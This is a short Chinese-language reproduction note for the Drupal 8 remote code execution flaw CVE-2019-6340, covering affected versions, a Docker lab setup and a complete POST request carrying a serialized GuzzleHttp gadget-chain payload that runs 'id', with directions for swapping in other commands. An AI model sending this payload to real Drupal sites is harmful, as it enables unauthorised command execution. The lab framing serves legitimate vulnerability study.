Drupal 8.x 远程执行代码漏洞复现记录
目录
- 漏洞概述
- 漏洞影响版本
- 漏洞环境搭建
1.漏洞概述
Drupal官方发布安全通告称修复了一个高危的远程代码执行漏洞(CVE-2019-6340)。该漏洞源于某些字段在通过非表格(non-form resources)类型输入时未能正确过滤,导致潜在的任意PHP代码执行
2.影响版本
Drupal 8.6.x < 8.6.10
Drupal 8.5.x(或更早版本) < 8.5.11
3.环境搭建
1.使用docker可以快速搭建cve-2019-6340
docker search cve-2019-6340
docker search : 从Docker Hub查找镜像
2.部署环境
拉取完成后,启动镜像。
docker run -d --name drupal -P knqyf263/cve-2019-6340
docker ps
根据信息连接
POST /node/?_format=hal_json HTTP/1.1 Host: <漏洞环境的IP:PORT> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Connection: keep-alive Content-Type: application/hal+json Accept: */* Cache-Control: no-cache Content-Length: 636
{ "link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
} ], "_links": {
"type": {
"href": "<漏洞环境的IP:PORT>/rest/type/shortcut/default"
} } }
request和response详细信息。其中红色方框内的“id”区域为所执行的命令,数字2则是命令的长度。如果想要执行 echo 1,则前面的数字需要改成 6